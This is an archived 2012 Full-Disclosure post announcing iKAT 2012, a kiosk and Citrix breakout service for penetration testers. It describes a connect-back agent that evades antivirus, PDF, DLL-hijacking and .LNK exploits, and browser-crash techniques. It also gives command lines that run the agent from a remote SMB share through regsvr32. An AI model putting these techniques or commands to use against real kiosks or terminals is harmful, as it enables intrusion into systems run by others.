lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 12 Aug 2012 16:05:15 +0800
From: Paul Craig <>
Subject: iKAT 2012 Release - Interactive Kiosk Attack Tool

iKAT 2012 - Interactive Kiosk Attack Tool
            Beating Heart Edition

It is with great pleasure that i would like to release this years
edition of iKAT - The Interactive Kiosk Attack Tool.

 * to bypass pesky blacklist filters ( also available on https )

Over the last 5 years iKAT has grown in popularity and is now the
de-facto standard for conducting penetration tests against
browser environments such as Citrix Terminals, Kiosks, WebTV's and
even In flight Entertainment systems.
iKAT is visited by over 100 confirmed Kiosks or Citrix environments
per-day and is currently spawning on average 3 system shells per hour.

iKAT is a 100% free SaaS website that you can visit from any browser
environment. iKAT will attempt to exploit the browser and spawn a
local shell for you.
This years version has had a major re-work on both the design/layout
and the underlying technology and aims to provide the smoothest,
fruitful experience yet.
I do hope you all enjoy the sleepless nights and hard work that has
been invested into iKAT 2012.

iKAT 2012 will be officially released + Demo'd at XCON 2012 in Beijing
China next week.

New Features of iKAT 2012:

During Defcon 19 i was approached by a sprightly girl with bright red
hair who asked me if i was "that Kiosk guy?"
I replied yes? And she proceeded to abuse my HTML development skill,
and told me that although iKAT is
technically a great tool - it resembles a 12year old's wordpress site.
Turns out this sprightly (and inebriated) girl was a web developer, so
i took her name-card and after the
conference emailed her and demanded that since she ridiculed my
development skills, she should write
me a new layout for iKAT, for free.
It is with great pleasure that i can say that iKAT is now "nice"
looking, easier to navigate, Web 2.0, and fully W3C compliant!
Big thanks to Melanie Wilke -, for her
donation of both time and effort.

Client / Server Model:
One of the largest technological changes in iKAT is the implementation
of a client/server model.
Kiosk vendors and AV vendors have been quick to blacklist and block my
tools and the success rate of previous iKAT
versions has been decreasing, so the only approach i found to work was
to drop a small iKAT Agent
and connect back to the iKAT server. The iKAT server will do all of
the post exploitation work for you!
This provides a much higher rate of success as i am able to kill and
evade AV, there is also a much higher
chance of not only spawning shells - but spawning system shells.
Over time the post exploitation methods will be refined to help you
stay one step ahead.
The iKAT agent has been included in each of the payloads and
exploitation methods so nothing changes in how you use iKAT.

New Tools / Exploits / Bug Fixes:
A raft of new tools and exploits have been developed for iKAT 2012 to
increase the attacks available to you.

These include:
Dynamic In-Memory Process Patching to generically defeat Windows Local
Group Policy
Additional SRP Bypass Techniques
Top #10 PDF exploits pre-loaded with iKAT agents
Available DLL content
Upgraded/Improved/Fixed tools.

New Browser Crashes:
The fuzzing servers have been working overtime finding new
(none-exploitable) crash conditions for popular browsers.
These exploits simply allow you to crash and close a browser, often
leading to the underlying desktop being exposed.
I dubbed this exploit "Emo-Kiosking", and although crashing the
browser may sound crude - it has proven to be the most
effective exploit against controlled browser environments as the
end-goal is to escape the browser.

Samba Service
iKAT now contains a world readable SMB share hosting the iKAT agents
in DLL and EXE form.
Hosted at \\\ikat this share contains ikat.exe and
ikat.dll and a suite of other tools.
This allows you to simply run \\\ikat\ikat.exe from the
command line to load the iKAT agent.
Alternatively you can regsvr32 \\\ikat\ikat.dll to
complete the same task.
This is incredibly handy when you are able to execute commands, but
cannot download a file.

Updated PhotoKAT:
PhotoKAT is the lesser-known Photo Kiosk exploitation tool.
This tool should be extracted to a USB Key or Memory Card and plugged
into Photo Kiosk.
PhotoKAT now attempts many new generic exploits against common Photo
Kiosk terminals.

Attacks include:
.LNK Shortcut Exploit to the iKAT Agent on the iKAT SMB server
DLL Hijacking of common libraries
Malicious PDF Files loaded with iKAT Agents
A suite of iKAT Tools

iKAT is a labor of love, and everything from the hosting, design,
research and exploits are donated by the community.
However there are some things that cost money, like our code-signing
certificate, and often real cash is required.
If you have ever used iKAT to pop shells on a job, or the project has
helped you in some way - please donate to the cause.
Every dollar helps and will go directly towards fighting the good fight.

My thanks to everyone who has helped the iKAT project over the years,
their names are included on the website.


Paul Craig

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists